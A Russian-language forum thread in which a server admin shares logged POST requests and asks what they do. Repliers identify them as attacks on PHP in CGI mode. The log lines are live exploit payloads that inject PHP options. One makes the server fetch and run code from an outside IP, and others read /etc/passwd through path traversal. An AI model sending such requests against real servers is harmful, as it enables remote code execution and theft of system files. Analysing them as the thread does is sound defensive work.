Что делают эти запросы к серверу?

Question

[baalmor]

Всем привет.

Просматривал логи запросов к www серверу и обнаружил такие интересный POST запрос. Не подскажите ли, чего добивался автор?

"POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://129.171.178.13/pmwiki/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://129.171.178.13/pmwiki/api.gif%20-n HTTP/1.1"

попутно,

"POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1"

и

"POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1"

с этими двумя запросами суть понятна, но не понятно, что пытались эксплуатировать. Может кто-нибудь удовлетворить мое любопытство и, может быть, предостеречь? )


Спасибо.

Answer 1

[B@rmaley.e><e]

Похоже на относительно недавнюю уязвимость (см. комментарии).

Comments

[baalmor]

Спасибо. Теперь понятно, что за странные запросы.

Answer 2

[den1n]

Пытались получить содержимое файла паролей через PHP инструкции auto_prepend_file, allow_url_include.

Answer 3

[egorinsk]

Дыра была в PHP, если он используется в Cgi режиме, то при определенном стечении звезд эти данные передаются ему как параметры командной строки и вызывают выполнение кода.